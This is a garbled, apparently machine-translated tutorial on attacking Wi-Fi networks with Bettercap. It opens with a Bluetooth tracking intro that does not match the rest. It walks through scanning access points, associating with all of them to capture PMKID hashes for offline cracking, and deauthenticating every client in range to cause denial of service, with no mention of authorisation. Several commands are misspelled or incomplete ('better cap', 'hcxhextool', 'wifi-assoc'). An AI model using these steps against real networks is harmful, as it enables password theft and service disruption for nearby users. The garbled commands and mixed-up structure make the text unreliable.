Bluetooth devices are everywhere and are used in mobile phones, watches, headphones, computers, etc. They are also a target for malicious users who aim to carry out simple or complex hacking attacks in order to collect, track or seize them. In today's guide we will see a brief description attacks with Bettercap.
Manufacturing speaking, while Bluetooth devices support random MAC addressing, many manufacturers do not use it, allowing Hackers to use tools like Bettercap to scan and track Bluetooth devices.
How useful the information collected with Bettercap is usually depends on the manufacturer devices, as Bluetooth in general is a more secure protocol than WiFi, if of course implemented correctly. Unfortunately for end consumers, many manufacturers do not choose to take advantage of protocol security such as random MAC addressing, so they broadcast the same MAC address everywhere. This makes it easy to track and makes it easy to determine what kind of device is behind the Bluetooth.
In this guide, we will use Bettercap to find Wi-Fi APs, do de-authenticate their customers and record them hashes with a PMKID attack.
Step #1: Install Bettercap
There are several ways to install Bettercap, but perhaps the easiest is to download and install it from the Kali repository
kali > sudo apt install better cap
Additionally, you can install the dependencies and then install the gems
kali > sudo gem install better cap
Step #2: Check your network adapter
Next, we need to check the Wi-Fi adapter. If you're using a VM like VirtualBox or VMware Workstation, you'll probably need an external USB Wi-Fi adapter (I use Alfa's network card. It's simple, cheap, and most importantly, it works!). Use the ifconfig command in Linux to find your adapter name.
kali > sudo ifconfig
Note that my adapter is called wlan0. Yours may be different. The key is to know what your system has named the Wi-Fi adapter.
Step #3: Start Bettercap
Next we need to start bettercap. As we'll be using it for Wi-Fi hacking, we'll need to tell bettercap on startup to use it wlan0 (will use eth0 by default).
kali > sudo better cap –iface wlan0
Let's take a look at the help file before we start. This is always a good first look when using a new tool.
kali > help
Note that only 2 are running modules, Events.stream and wifi. To display the help screen for any module, just type help followed by his name module. In this case, let's look at the wifi help screen.
kali > help Wireless
For starters, let's do an identification of the nearby wifi-APs.
Step #4: Check your nearby Wi-Fi APs
To launch bettercap's recon module, simply enter the command wifi.recon on.
kali > wifi.recon on
Bettercap now tries to find all APs in range and record their basic parameters.
We can import it wifi.show to see all found Wi-Fi APs and their basic parameters such as BSSID, SSID, type encryptionand whether they use WPS but also the type of WPS (1.0 or 2.0).
kali > wifi.show
With this information, we can choose to use another application such as aircrack-ng to crack these APs or proceed with one of the applications bettercap cracking.
Step #5: PKMID Attack
One of the newer wi-fi attacks is the PMKID attack (for more information on the PMKID attack, click here). One of the key advantages of the PMKID attack is that you don't have to wait for one to connect client with the AP to capture the password hash. The weakness of this attack is that it can be very slow.
To launch the PMKID attack, we must first use the command wi-fi.assoc. You can choose to connect to one or all APs within range. To connect to a single AP, follow the command wifi.assoc with the BSSID of the selected AP. To connect to all APs, follow the command with all APs.
kali > wifi.assoc ALL
When bettercap records the handshake, it places it in a file at ~/bettercap-wifi-handshakes.pcap (you can specify the handshake file using the parameter wifi.handshakes.file followed by the location and file name).
kali > wifi-assoc ALL wifi.handshakes.file /home/kali/handshakes
To crack the hashes, you should first edit them and remove all unnecessary information in the handshake reception using hcxhextool and then use a tool like hashcat to crack them (for more information on this process see the PMKID attack guide here).
Step #5 De-Authenticate with Bettercap
One of the often overlooked attacks against Wi-Fi APs is Denial of Service (DoS). Among the multitude of frames available in wi-fi is the frame deauthentication ή deauth frame. This box disables any user/client login to the AP and forces them to login again. This can be very useful for forcing the client to resend their hash in a traditional WPA2 attack, or if done continuously, can prevent the user/client from being able to re-authenticate, creating a denial of service situation.
Bettercap makes it simple to disable the client/user by just using the command wifi.deauth followed by the BSSID of the AP from which you want to disable clients, such as:
kali > wifi.deauth
To block authentication of all clients on all APs, simply use the all keyword and bettercap will start running all APs and block authentication of all clients connected to the AP.
Summary
Bettercap is a great tool for Man-in-the-Middle attacks, but I find it a bit difficult to use for Wi-Fi attacks. I have been using aircrack-ng for many years and know it well. The beauty of this industry is that there are so many different tools and I'm sure you can find one that works well for you. Many beginners may prefer the easy-to-use environment and helpful features displays Bettercap's Wi-Fi hacking help.